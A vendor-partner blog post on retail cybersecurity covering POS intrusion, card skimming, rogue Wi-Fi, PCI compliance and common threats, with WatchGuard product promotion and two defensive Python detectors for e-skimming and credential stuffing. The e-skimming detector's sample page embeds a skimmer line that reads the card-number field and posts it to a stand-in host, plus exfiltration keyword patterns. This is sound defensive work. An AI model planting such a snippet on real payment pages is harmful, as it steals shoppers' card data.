There are few things more difficult than building a retail business. Not only because of the countless variables it involves, but because changes in consumer habits have forced the sector to digitize: and this transformation has made it the new "sweetheart" of cybercrime.
If you promise not to be alarmed, I will give you a brief presentation of the current state of affairs:
- In 2020 alone, of all the cyberattacks that occurred worldwide, 24% targeted the retail sector;
- 77% of retail businesses were targeted by at least one ransomware attack in 2021, an increase of 75% from the previous year;
- The retail sector was the second most affected by ransomware in 2021, only behind the media, leisure and entertainment industry;
- Among business owners surveyed, 92% say the attacks have affected their ability to operate and 89% say they have lost business or revenue following the attack.
"Retail continues to suffer from one of the highest rates of ransomware attacks recorded across industries. With more than three in four businesses expected to suffer an attack in 2021, surely incidents of this kind are now a matter of 'when' rather than 'if'." - Chester Wisniewski, Research Scientist at Sophos
Of course there is a case for paying attention to this topic; the problem is that any retail entrepreneur already has their head flooded with questions about:
- Stock management;
- Hiring, training and administration of human resources;
- Costs of energy, new equipment, space, people and systems;
- Prices, supply and growth (even more so in the face of fluctuating commodity prices);
- Building trade relationships that allow products to be sold;
- Customer satisfaction - now also online!
And that's just to name a few!
Between paperwork, meetings and family, the hours in the day aren't enough to do even half of what needs to be done. You rush through the day and one day you arrive at the office to find that a cyber-attack has cut off your access to files and equipment critical to the running of the company!
Beware: studies indicate that 87% of customers would not do business with a company that has suffered a data breach. Remember that the effects of an attack go far beyond immediate consequences like lost revenue!
To prevent this from happening, let's find out:
- Why retailers are attacked more than other sectors
- What risks a retailer should be aware of
- How the most common types of attack affect retailers
- How to spot danger before you are attacked
- Best practices: 7 rules you should follow from today onwards
I'll give you what you need so that your company doesn't join the already long list of victims in the Portuguese business sector. Are you ready?
Why are retailers attacked more than other sectors?
It's important to understand why your type of business is such a target for hackers: because that's when you'll understand what a cybercriminal is looking for when they break into your systems.
Shall we start at the beginning?
Retail businesses are storing increasing amounts of customer data, including credit card numbers. This type of information is a valuable element, which can be sold on the notorious dark web.
But we don't stop there. The growing use of the cloud and mobile apps are taking your business online. And that in itself is not a bad thing: it's a way forward, helping you to lower costs and increase the responsiveness of your business. But it also opens up new threat vectors.
Shall we get concrete?
Nowadays, many retail companies are a hybrid between physical and online stores. This nature requires the use of several technologies simultaneously: for example, POS in physical stores and cloud payment systems in eCommerce. It is from these technologies, which serve new consumer habits, that new threat vectors emerge:
- Cloud botnets: cybercriminals infect and control multiple computers on your system and can even rent access to your customers' data to third parties;
- NFC payments: the famous contactless, which customers love, and so do criminals, because they have found ways to intercept the data exchanged between devices and ATMs, to sell it or use it without consent;
- Software-level vulnerabilities: remember that manufacturers are concerned with making their software perform a certain task; not with protecting your system.
- Lack of P2PE (point-to-point encryption) in POS systems: in short, P2PE transforms the card information into code that is unreadable and inaccessible to the criminal at the exact moment of a physical purchase;
- Use of insecure third-party plugins: it could be a plugin as simple as a free program to change the color of your website's payment page - and be corrupted or a decoy that actually responds to a cybercriminal!
But because I know these buzzwords mean little to you - and because I really want this article to be accessible - I've put together a list of the most common risks a retail business faces and the solutions that can protect you.
Come with me!
Retail: what cybersecurity risks should I be aware of?
We've teamed up with our partner WatchGuard to show you the risks a retailer faces and then explain what solution you should invest in to mitigate the chances of falling into that trap.
When the goal is to steal money, the cybercriminal will look to hack into your POS or Point of Sale. Typically, the process involves placing malware on a vulnerable system, in order to capture customer payment information.
Some criminals develop their own malware, but in the vast majority of cases it is easy to find such malware on the notorious dark web. And the moment the cybercriminal is in possession of several credit cards, the whole criminal network gets to work:
- Some people buy and sell card numbers;
- Some people produce counterfeit cards;
- There are recruiters who find people to make purchases with fake cards;
- And finally, there are people who do the actual shopping!
To stop this whole chain from getting to work on your customers' data, to their detriment and to your company's reputation, you can start with a simple solution:
Single-factor authentication, such as a password, is not a sufficient precaution to avoid this risk: you must boost your POS security levels with a two-factor authentication process.
In the video below, our commercial director Manuel Alves explains in an uncomplicated way how this technology works, within the reach of any company:
WatchGuard experts explain that "to reduce the likelihood of network disruptions and data loss from stolen credentials, AuthPoint utilizes a Push message, QR code or one-time password (OTP) as an additional factor for anyone accessing the system to prove their identity."
"A critical step in securing access to valuable data on the network is implementing MFA or Multi-Factor Authentication. WatchGuard's AuthPoint goes beyond traditional two-factor authentication and considers innovative ways to identify users seeking to access the network."- WatchGuard on Cybersecurity in Industry 4.0
But the solutions don't stop there. Read on to find out how to apply a second layer of security against attacks on your POS.
To monitor your POS environment, WatchGuard recommends using a watchdog tool: Dimension. This cloud-based solution accompanies WatchGuard's UTM firewall and offers automated reporting tools that identify security threats for you.
Problems, trends or suspicions: there are over 100 reports and dashboards that you can automate to be delivered to you by email.
Remember to separate the network where your POS connects from the general network where customers and employees browse social media and open email. This practice is called network segmentation and all WatchGuard firewalls support it.
Let's go back to the video of our commercial director Manuel Alves to discover, in a simple way, how this technology works, within the reach of any company:
WatchGuard experts explain that "segmenting your network (IIoT, Guest WiFi, corporate network, etc.) helps isolate critical devices from other traditional equipment, such as desktops. This limits the destructive spread of an attack, should it happen.
Network segmentation can be easily accomplished with a UTM firewall like WatchGuard's Firebox T35-R - designed to protect networks in harsh environments, withstanding dust, moisture and extreme temperatures."
Now that you know three ways to protect your business from POS intrusions, let's look at the second risk a retailer typically faces: payment card theft.
If POS system intrusions amount to a kind of robbery through the back door, card theft is a crime through the front door, with the help of a locksmith. Here, the cybercriminal implants a physical theft device into a piece of store equipment that reads magnetic cards.
And you're wrong if you think this only happens to the most inattentive: we even see processes as meticulous as tiny cameras positioned to capture PIN codes!
Ready to learn how to avoid this risk?
When it comes to equipping your business or when it's time to renew equipment, opt for terminals that are resistant to data theft. Terminals that make tampering harder for the criminal make it less likely that hackers collect cardholder information.
Frequent monitoring of surveillance videos and tamper-evident stickers on terminal ports, although classic processes, are two excellent ways to start protecting yourself.
But for technology solutions that truly look after the security of your POS systems, we recommend using WatchGuard's Total Security Suite: which combines several security services to offer multi-level protection against malicious POS software.
[Video 1 - WatchGuard's Total Security Suite: How it can be useful for retailers]
Very important: training your employees to know how to detect if there has been a tampering process is also key. Integrate the practice into the entire team's processes as a regular task!
Now that you know three ways to protect your business from POS intrusions and two solutions to prevent card theft in your establishment, let's look at the third risk you as a retail business owner may face.
You know this better than I do: customers today demand WiFi in shops. It enables not only a longer customer stay in the store, but also streamlines functionalities - such as contactless payment - that lead you to sell more.
Providing an internet connection is seemingly easy. But securing it and ensuring that it does not become a threat to the prosperity of your business is a more demanding challenge.
The convenience that a WiFi network offers to your customers also gives cybercriminals a new gateway. An example: a cybercriminal places an AP or Access Point in the vicinity of your store and your customers start connecting to it. The result of this vulnerability is one of two scenarios:
- Either the cybercriminal gains access to these customers' data;
- Or plants malware on the connected devices, to run when they later connect to a secure network - like your business network!
Let's learn how to mitigate this risk with simple processes, within reach of any company.
Before thinking that danger is just around the corner, let's focus on what's important: the customer. And for them, we need to ensure fast connection speeds across a wide physical area, without compromising network security levels.
If we look at WatchGuard solutions, the AP125, AP325 and AP420 models are suitable for indoor retail environments. The rugged AP327X is ideal for outdoor deployments, as it extends secure Wi-Fi connection in shopping centers, markets, tourist attractions and other larger spaces.
If you already offer fast WiFi to your customers, the next step is to make sure you're not giving away their data to cybercriminals.
WatchGuard's WIPS detects and classifies all access points and connected devices - such as tablets or smartphones - and ensures that unacceptable connections are disabled immediately.
It controls all access points in the authorized airspace, without illegally disrupting neighboring WiFi networks. This means that if there is a school in the neighborhood, you don't run the risk of accidentally disabling that WiFi, just because your system didn't recognize it!
So far, you have learned:
- Three ways to protect your business from POS intrusions;
- Two solutions to prevent card theft in your establishment;
- Two tools to manage access to the WiFi network.
But we're not done yet: it's time to learn about the fourth and final risk that every retail entrepreneur faces...
...and most of them are completely oblivious to this issue!
I know: you'd probably rather go do the half marathon than worry about more protocols... But did you know that there is a Payment Card Industry Data Security Standard?
It is a set of rules that businesses must follow when they decide to accept credit card payments (online and offline). But beware: only 39% of small and medium-sized enterprises are compliant!
The consequences of failing the PCI standards vary:
- Fines between 5 and 100 thousand dollars per month;
- Banks may increase your fee per transaction;
- Or worse: suspend collaboration with your company!
To help: I'm going to give you four quick tips that will teach you how to ensure your company is one step closer to maintaining PCI compliance.
If you're looking for a new UTM terminal, find one that provides defense in depth - which, in practice, translates into the use of multiple layers of security. These include measures such as:
- Content filters
- Malware analysis
- Intrusion Prevention
These measures are implemented in several layers of defense, each with its own specific function. But they all work together to protect the system against external threats!
If you're used to following our Facebook or Instagram, you've probably heard of Multi-Factor Authentication. But did you know that, especially in the retail sector, regulations are getting stricter about adopting this system?
Practical example: PCI DSS 3.2 Requirement 8.3 made the use of MFA mandatory for access to computers and systems containing sensitive cardholder information. In a nutshell...
...if your business accepts credit card payments, two-factor authentication has become the minimum requirement for the in-store computers that store this information!
Remember that WatchGuard's MFA - AuthPoint™ - is one of the solutions that can help you become PCI compliant. The system goes far beyond two-factor authentication and can help you protect not only your store's computers, but:
- Cloud Applications
- Internal networks
In the image above, you can observe a real situation of someone who received a message on their smartphone to authorize a login made on a fixed computer. Simple and safe, above all!
It's yet another of the PCI requirements and involves regular maintenance to ensure that no security holes develop over time. And while it's true that WatchGuard can make the process easier, with a tool called Web UI...
...remember to ask a technology partner for help if you don't know much about these types of configurations!
For the curious: the Web UI is the browser-based management interface of WatchGuard's security appliance, which protects a company's network from external threats. The appliance is shaped like a red box - the famous Firebox. Via the browser, the Web UI gives us access to security features such as firewalls, VPNs or protection against spam and viruses:
In addition, WatchGuard's Web UI allows network administrators to monitor network traffic, peek at reports and run diagnostics for security issues. For those who want to take on the configuration of their Firewalls themselves, the process will involve steps such as:
- Internal and external intrusion testing
- Documentation of settings
- Network diagram with card data flow
- Implementation of anti-spoofing method
Remember that you can pay a monthly fee for setting up firewalls on company computers that store card data. But even if you want to manage the process yourself - and to avoid fines - what you should not do is accept card payments and neglect this layer of protection!
As a business owner in this sector, it is normal that you are "obliged" to process cardholder data - because people use less and less physical cash. But it's one thing to process data, it's quite another to store it....
...storing data represents an additional set of standards and challenges that you must be prepared to respond to!
Now, one of the quickest ways to achieve PCI compliance is to take storage out of the equation and simply not store. If there is an absolute need to do so:
- Enable strong encryption for all stored data.
- Remember that only people inside the company who really need it should have access to this database and each one should have their own unique credentials (yes, the most used password in the world is still 1234546)!
But beware: talking about specific threats such as PCI compliance or credit card theft does not mean that retail lives on the sidelines of common threats such as traditional forms of phishing or ransomware....
Is retail also a target of the most common attacks?
Being aware of specific forms of attack does not mean neglecting the basic care that any entrepreneur should take. I don't want to go into detail on this issue, but I want to make sure that as an entrepreneur you are alert to the risk of:
🚨 Phishing
While there are various forms of phishing, the most common typology is crystal clear: the cybercriminal sends a fake email that appears to come from a legitimate source. You - or an employee of your company - click on a link or download a malicious attachment...
...and the rest is history: the attacker can now steal information stored on your computer or browser, or install other forms of malware to cause even more damage to the victim of the cyberattack!
💡 The solution
A good starting point is to keep security software, operating systems and browsers up to date. Remember that a consultation with an IT specialist can help you identify additional security measures!
🚨 Ransomware
Let's talk about the elephant in the room: most IT networks in retail businesses have vulnerabilities. And the cybercriminal takes advantage of them and encrypts systems in order to paralyze the business until someone pays the ransom.
The list of organizations in Portugal that have already been targeted by ransomware attacks is hard to believe, to say the least:
- Sport Lisboa e Benfica
- Portuguese Sea and Atmosphere Institute
- Record Newspaper
- Correio da Manhã
- Jornal de Negócios
- Sábado Magazine
There are even more victims, but you can avoid joining the list as long as you embrace the practices we share throughout this article!
💡 The solution
It's far from perfect: but a good antivirus, tailored to your company's operational process, can offer real-time protection against ransomware!
🚨 Data breach
I've already shared with you that customer data, particularly credit card data, is a valuable item in underground markets. And to hack into your company's system and steal them, the criminal doesn't even need to resort to phishing or ransomware...
...if the company does not use multi-factor authentication, all you need to do is to be in possession of stolen credentials to enter the system and take as much as the stolen access allows you!
Worse, companies shouldn't assume that the only people interested in stealing data are out of doors. According to the Verizon 2020 DBIR report, 30% of data breaches that occurred during 2020 involved internal staff.
💡 The solution
To mitigate this risk, you need a 360° strategy that involves: antivirus on the endpoint, a properly configured firewall, DDoS mitigation, regular audits and internal training of your employees - not forgetting frequent data backups!
🚨 Attacks on IoT devices, payment systems and other technologies
In retail, numerous entrepreneurs are investing in NFC technologies - the famous contactless - or others, such as Venmo or Cash App, to process payments. The idea gained popularity during the pandemic, when the goal was to eliminate physical contact and avoid contagion...
...but obviously cybercriminals took advantage and, in 2020 alone, 9 out of 10 of the most exploited vulnerabilities targeted IoT devices like this one.
💡 The solution
Remember that the solution is to use P2PE encryption!
🚨 Advanced Persistent Threats or APT
Technological progress has provided the retail entrepreneur with useful tools to save costs, make life easier for the customer and increase the quality of the service provided. Many have taken the ride and ended up:
- Adopting more cloud services
- Implementing more complex IT systems
- Networking between geographically distant points of sale
Positive? Of course.
But this transformation means that many of these companies have increased their digital footprint. They have therefore expanded the available attack surface, which makes the criminal harder to detect and makes it more likely that APTs will keep their hold on compromised systems for longer.
💡 The solution
Adopt proactive protection measures such as perimeter defense with advanced threat detection and response services.
🚨 Attack on the supply chain
Companies in this sector - especially those working with e-commerce - involve several suppliers in their operation. This happens with almost all of them, from the multinational to the small business owner using drop shipping.
All it takes is one vulnerable access point at just one of these suppliers and the supply chain is at risk: both the sales system itself, the management of the operation and your customer's secret data.
💡 The solution
Preventive measures such as regular third-party risk assessment can help you identify weaknesses. If you want to go further, hire an endpoint security service to monitor events, scan for threats, detect malware and virus intrusion or identify suspicious behavior!
🚨 E-skimming
In this article, we have already talked about the importance of being PCI compliant. The bad news is that online buyers and sellers are not always protected against fraud, even if they are compliant.
Thanks to e-skimming, the criminal places a cloning code on payment card processing pages in online stores. The code captures credit card and other sensitive data.
"This threat has impacted e-commerce companies in the retail, entertainment, and travel industries as well as utility companies and third-party vendors; it is also commonly targeting third-party vendors such as those who provide online advertisements and web analytics." - CISA, Cybersecurity and Infrastructure Security Agency
💡 The solution
Browse on devices with up-to-date antivirus and anti-fraud software. That way you can prevent your data from being stolen online. And of course: look for antivirus or network protection that enables DNS protection for all users.
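On the merchant's side, the practical defence against the cloning code described above is to keep an inventory of the scripts authorised on the payment page and to check the live page against it. The block below is an added example written for this article, not CISA's or WatchGuard's code: it parses a checkout page, flags script hosts outside a constructed allow-list (shop.example.com and pay.example.net are assumed names), flags authorised third-party scripts loaded without Subresource Integrity, and applies a simple heuristic to inline code that both reads card fields and sends data. The sample page is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allow-list for a hypothetical shop: its own host plus the payment provider's script host.
FIRST_PARTY_HOSTS = {"shop.example.com"}
AUTHORIZED_THIRD_PARTY = {"pay.example.net"}

# Constructed checkout page: two legitimate scripts, one injected loader, one inline snippet
# that reads the card field and posts it elsewhere (the integrity value is a placeholder).
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://pay.example.net/sdk.js" integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://assets.example.org/t.js"></script>
</head><body>
<form id="payment"><input id="cardNumber"><input id="cvv"></form>
<script>
  var n = document.getElementById('cardNumber').value;
  fetch('https://assets.example.org/c', {method: 'POST', body: n});
</script>
</body></html>
"""

CARD_FIELD_HINTS = ("cardnumber", "card_number", "cvv", "cvc", "pan")
EXFIL_HINTS = ("fetch(", "xmlhttprequest", "sendbeacon", "new image", ".src=")


class ScriptCollector(HTMLParser):
    """Collects every <script> tag with its src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data  # HTMLParser hands script content to handle_data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_checkout_page(html, page_host, first_party=FIRST_PARTY_HOSTS, authorized=AUTHORIZED_THIRD_PARTY):
    """Return (kind, detail) findings: scripts from unexpected hosts, authorised third-party
    scripts without SRI, and inline code matching a simple read-card-then-send heuristic."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or page_host  # relative src means same origin
            if host in first_party:
                continue
            if host not in authorized:
                findings.append(("unexpected_script_host", s["src"]))
            elif not s["integrity"]:
                findings.append(("third_party_without_sri", s["src"]))
        else:
            body = s["body"].lower()
            if any(h in body for h in CARD_FIELD_HINTS) and any(h in body for h in EXFIL_HINTS):
                findings.append(("inline_exfil_heuristic", s["body"].strip()[:60]))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML, "shop.example.com"):
        print(f"{kind}: {detail}")
```

Run it on a scheduled basis against the live payment page and alert on any finding or on any change in the script inventory; the heuristic on inline code is deliberately simple and should be treated as a trigger for manual review, not proof.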
🚨 DDoS attacks
DDoS stands for Distributed Denial of Service and occurs when a cybercriminal sends multiple requests to a particular network resource - such as a website - exhausting its ability to respond.
In 2021, this type of crime increased by 200%, month after month, largely because of the Meris botnet. With or without Meris, the truth is that the retail sector was the one that suffered the most monthly attacks, with the majority (61.6%) targeting North American companies.
💡 The solution
With the help of a firewall managed by some of the world's most trusted providers, such as Cisco, you'll enjoy a kind of barrier protection for unwanted network traffic.
🚨 Credential Stuffing
It's a cybercrime tactic that boils down to trying stolen username and password combinations across multiple websites. And anyone who thinks it's uncommon is mistaken: a study by Help Net Security reveals that during 2021 there was a 98% increase in this type of attack compared to the previous year.
The explanation is simple: your customers reuse login credentials across multiple accounts, so if the cybercriminal obtains a password and username via phishing, he can use them on multiple websites - and even make unauthorized purchases with the same access as much as he wants.
💡 The solution
Use a secure credential manager such as KeePass or Bitwarden.
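On the shop's side, credential stuffing leaves a recognisable trace in the login log: one source address trying many different usernames with almost no successes. The block below is an added example written for this article, not from any vendor: it parses constructed login log lines (the format and the TEST-NET addresses are assumptions) and flags source IPs showing that pattern over a sliding window, while leaving alone a single user who mistypes a password and an office NAT whose many users all log in successfully.

```python
import re
from collections import Counter, defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts ip user success")

# Log format assumed for this example (constructed; adapt the regex to your web server or IdP).
LINE_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")

# Constructed sample: one stuffing run from 203.0.113.5, one forgetful user, one office NAT.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z ip=203.0.113.5 user=alice result=FAIL
2024-03-01T10:00:02Z ip=203.0.113.5 user=bob result=FAIL
2024-03-01T10:00:02Z ip=203.0.113.5 user=carol result=FAIL
2024-03-01T10:00:03Z ip=203.0.113.5 user=dave result=FAIL
2024-03-01T10:00:03Z ip=203.0.113.5 user=erin result=FAIL
2024-03-01T10:00:04Z ip=203.0.113.5 user=frank result=FAIL
2024-03-01T10:00:05Z ip=203.0.113.5 user=grace result=OK
2024-03-01T10:01:00Z ip=198.51.100.7 user=bob result=FAIL
2024-03-01T10:01:20Z ip=198.51.100.7 user=bob result=FAIL
2024-03-01T10:01:45Z ip=198.51.100.7 user=bob result=OK
2024-03-01T10:02:00Z ip=192.0.2.10 user=heidi result=OK
2024-03-01T10:02:10Z ip=192.0.2.10 user=ivan result=OK
2024-03-01T10:02:20Z ip=192.0.2.10 user=judy result=OK
2024-03-01T10:02:30Z ip=192.0.2.10 user=mallory result=OK
2024-03-01T10:02:40Z ip=192.0.2.10 user=niaj result=OK
2024-03-01T10:02:50Z ip=192.0.2.10 user=olivia result=OK
"""


def parse_log(text):
    """Parse log lines into Event tuples, skipping lines that do not match the format."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(Event(ts, m["ip"], m["user"], m["result"] == "OK"))
    return events


def detect_credential_stuffing(events, window_minutes=5, min_distinct_users=5, max_success_rate=0.2):
    """Flag source IPs that, within a sliding window, try many different usernames with a low
    success rate. One user retrying a password (one username) or an office NAT (many users,
    high success rate) does not match. Returns {ip: summary}, keeping the widest window seen."""
    window = timedelta(minutes=window_minutes)
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev.ip].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.ts)
        users, successes, start = Counter(), 0, 0
        for end, ev in enumerate(evs):
            users[ev.user] += 1
            successes += ev.success
            while evs[start].ts < ev.ts - window:  # drop events that fell out of the window
                old = evs[start]
                users[old.user] -= 1
                if users[old.user] == 0:
                    del users[old.user]
                successes -= old.success
                start += 1
            attempts = end - start + 1
            if len(users) >= min_distinct_users and successes / attempts <= max_success_rate:
                if len(users) > findings.get(ip, {"distinct_users": 0})["distinct_users"]:
                    findings[ip] = {
                        "distinct_users": len(users),
                        "attempts": attempts,
                        "successes": successes,
                        # accounts the run actually got into: these need a forced password reset
                        "compromised_users": sorted(e.user for e in evs[start:end + 1] if e.success),
                    }
    return findings


if __name__ == "__main__":
    for ip, summary in detect_credential_stuffing(parse_log(SAMPLE_LOG)).items():
        print(ip, summary)
```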
Allow me to refocus on the central subject of this article; this is the state of play: you already know the risks but, until a problem arises, you have no idea how to assess whether danger is approaching...
...but that is about to change!
Cybersecurity in retail: how to spot the danger?
If you've been alarmed by the amount of risk your business is subject to and want to ensure you do everything you can to avoid problems, I'll help you know where to start.
There are nine questions that any cybersecurity expert will ask you when they question you about your company's cybersecurity levels. Ask them to yourself, and follow the trail that any top expert usually follows:
1 - "What do you use to protect your network and your stores?"
Most security solutions should be replaced every three years. So, after checking whether one exists at all, the expert will look at whether it needs updating or whether the renewal deadline is approaching. You can do the same exercise yourself.
Remember to confirm with your service provider that your cybersecurity solution covers the full extent of your supply chain: from current threats - such as typical forms of ransomware - to future challenges posed by upcoming growth.
2 - "Explain to me how you manage the systems of all the stores."
Services like WatchGuard's System Manager allow you to manage the IT of multiple geographically distant stores from a single central point. With it, you can create multiple security models to simplify and centralize the administration process.
The cybersecurity expert knows that your business is more vulnerable if the various stores in the chain have autonomy in terms of defense. An unprotected computer or an untrained operator is enough for the cybercriminal to penetrate and your customer's data is at risk.
3 - "Are you concerned about installing security in new branches or the challenges of replacing outdated security systems periodically?"
The cybersecurity expert knows that entrepreneurs deal with real problems. And that lack of care is often related to simple problems like lack of time. When considering a new cybersecurity system, consider how easy it is to handle and keep it up to date.
Remember that WatchGuard has created a simple deployment process called RapidDeploy: it allows you to remotely equip branches with up-to-date security systems and configure them remotely, eliminating the need for physical visits.
4 - "Does the current security solution help maintain PCI compliance?"
Some cybersecurity systems provide periodic reports on the system's PCI compliance. Remember that the standards associated with PCI are constantly being updated and it will make your life easier if you set up automations to avoid being subject to fines.
Very important: in each branch, the network security system must be able to separate point-of-sale traffic from corporate traffic. This is one of the many PCI requirements, which the cybersecurity system must be able to guarantee.
5 - "Is the current security solution enterprise-grade or in common use?"
Although the principles are similar, a cybercriminal will not attack a home user in the same way as they will attack your business. Ensure you use advanced malware protection, web content filtering, intrusion prevention services and the full range of tools that provide a secure business network.
6 - "Do you offer WiFi to your customers and store visitors?"
Businesses in the retail sector are under increasing pressure from customers, employees and suppliers to offer fast and secure internet access. If this is the case for you, ensure your WiFi system is PCI compliant, allows network segmentation and generates regular security reports.
7 - "On a scale of 1 to 10, how secure is your guest WiFi network?"
A cybersecurity expert knows that the airspace of a retail business is often invaded by unauthorized devices - which enable data interception and denial of service attacks. Be prepared for this reality.
WatchGuard's WIPS system is one that safeguards network access points from unauthorized intrusion. Go even further with WatchGuard's Firebox to control the batch of zero trust applications that will protect you against specific forms of malware.
8 - "Can you manage the WiFi networks of all branches from a central point?"
Installation, configuration, monitoring and troubleshooting: the chosen network management system should be prepared to be administered from a central point. Do not allow a complex process such as WiFi network management to be conducted arbitrarily by local managers.
In operation, the chosen enterprise WiFi system, managed from the cloud, should allow you to resize the network specifically for different locations; and give you the opportunity to select specific settings for each grouping: be it a building, floor or specific room.
9 - "Is your WiFi system a source of income?"
Once security is established, it's time to put the systems to work for you. Captive portal tools can help you turn the connectivity of a WiFi network into richer experiences for customers, guests and employees - with targeted offers, news and promotions.
A simple wireless network can help you build the database your marketing team needs and be a powerful source of loyalty with stakeholders who are in the habit of visiting your physical locations.
It's likely that asking yourself these nine questions has set off some alarm bells. Don't worry. In the next section I will reveal the 7 practices to avoid being attacked. Use these pointers as a kind of checklist.
How to avoid being attacked: retail cybersecurity best practices
If you didn't have the patience to read the whole article and simply want to find out what you should do, you are in the right place. Enjoy: at the end of the list, I have added a downloadable image with the seven best practices you should follow.
- Encrypting sensitive data
Credit card numbers should not be retained by you - but if retention is mandatory, ensure that data is encrypted, whether it is stored or in transit. To balance the need for privacy with ease of use, homomorphic encryption is often used.
- WiFi network segmentation
Keep POS data, PII and other customer financial information secure. Remember that network monitoring tools should look for signs of lateral movement, APTs and breach attempts.
- Regular backups
Minimize the potential for data loss after a ransomware or phishing attack. They happen. Safeguard data from your eCommerce site, POS system and other critical applications in your supply chain. Automate this process.
- Network-wide Anti-Malware
Cover the full extent of your retail business and cover any geography. This should include security patches on all software and applications used on the shop floor.
- Multifactor Authentication (MFA)
Protect yourself against phishing attacks or account hacks. If your e-commerce is already a reality, remember to use a platform that complies with the Payment Card Industry Data Security Standard (PCI-DSS).
- Zero Trust Access
The Zero Trust Access approach controls a user's identity and access, a bit like "I trust no one". It grants secure remote access to applications, data and services to individuals - not to an entire network, as VPNs do.
- Team Training
In the last two years, according to IBM, insider threats in the retail sector have grown by 38%. What's more, 81% of malicious breaches start with compromised passwords. No doubt about it: training your employees is one of the best strategies to increase your company's cybersecurity.
I have a business in the retail sector: where to start?
If you're interested in some of these tools and fear for the security of your business's supply chain, check out what our founder Nuno Diniz told some of the retail entrepreneurs who have become our customers:
If you prefer a free online assessment, remember that you can schedule a 30-minute online meeting with one of our experts!